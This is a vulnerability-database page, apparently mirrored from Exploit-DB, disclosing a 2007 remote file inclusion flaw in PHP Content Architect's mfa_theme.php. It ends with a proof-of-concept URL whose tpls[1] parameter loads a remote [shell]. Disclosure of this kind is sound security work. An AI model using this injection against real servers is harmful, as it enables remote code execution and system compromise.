PHP Content Architect 0.9 pre 1.2 - 'MFA_Theme.php' Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056238 漏洞类型
发布时间 2007-05-07 更新时间 2007-05-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/29953
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/23843/info

PHP Content Architect is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

PHP Content Architect 0.9 pre 1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]noah/modules/noevents/templates/mfa_theme.php?tpls[1]=[shell]